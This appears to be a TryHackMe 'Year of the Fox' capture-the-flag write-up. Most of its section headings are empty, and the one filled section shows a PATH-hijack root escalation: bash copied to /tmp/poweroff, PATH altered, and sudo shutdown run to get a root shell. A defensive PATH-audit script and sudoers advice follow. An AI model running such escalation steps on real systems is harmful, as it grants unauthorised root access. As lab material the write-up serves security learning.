Year of the Fox — TryHackMe

Enumeration

Web Enumeration:

Enumerate Username:

Brute Force Web Login

Reverse Shell

Catch Reverse Shell on Kali:

Web Flag:

User Privilege Escalation

Running chisel on kali:

Running chisel on target:

Root Privilege Escalation

cp /bin/bash /tmp/poweroff
fox@year-of-the-fox:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
fox@year-of-the-fox:/tmp$ PATH=/tmp:$PATH
fox@year-of-the-fox:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
fox@year-of-the-fox:/tmp$ sudo /usr/sbin/shutdown
root@year-of-the-fox:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@year-of-the-fox:/tmp# cat /root/root.txt
Not here - go find!
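
Judging by the session above, `sudo /usr/sbin/shutdown` kept the user's modified PATH and a lookup of the bare name `poweroff` found `/tmp/poweroff` first. The script below is an added example, not part of the original write-up (the function names `audit_path` and `first_match` are made up for illustration): it flags PATH entries that allow this kind of shadowing and shows which file a bare command name resolves to.

```shell
#!/usr/bin/env bash
# Added example: flag PATH entries that let an unprivileged user shadow a
# command that a privileged program calls by bare name (e.g. "poweroff").

# True if the directory (symlinks followed) has the world-write bit set.
is_world_writable() {
    case "$(ls -ldL -- "$1" 2>/dev/null)" in
        ????????w*) return 0 ;;   # 9th character of the mode string is "other: write"
        *) return 1 ;;
    esac
}

# audit_path PATH_VALUE: print one finding per risky entry.
audit_path() {
    local rest="$1:" dir
    while [ -n "$rest" ]; do
        dir="${rest%%:*}"; rest="${rest#*:}"
        if [ -z "$dir" ] || [ "${dir#/}" = "$dir" ]; then
            echo "RELATIVE ${dir:-<empty>}"   # resolved against the current directory
        elif is_world_writable "$dir"; then
            echo "WORLD_WRITABLE $dir"
        fi
    done
}

# first_match NAME PATH_VALUE: print the file a bare NAME would resolve to.
first_match() {
    local name="$1" rest="$2:" dir
    while [ -n "$rest" ]; do
        dir="${rest%%:*}"; rest="${rest#*:}"
        [ -z "$dir" ] && dir=.
        if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            echo "$dir/$name"; return 0
        fi
    done
    return 1
}

# Sample input: the two PATH values shown in the session above.
for p in "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games" \
         "/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games"; do
    echo "PATH=$p"
    audit_path "$p"
    first_match poweroff "$p" || echo "poweroff: not found"
done
```

On the sudo side, `Defaults env_reset` together with a `secure_path` in sudoers keeps a caller's PATH from reaching the privileged command.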

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

0xsanz
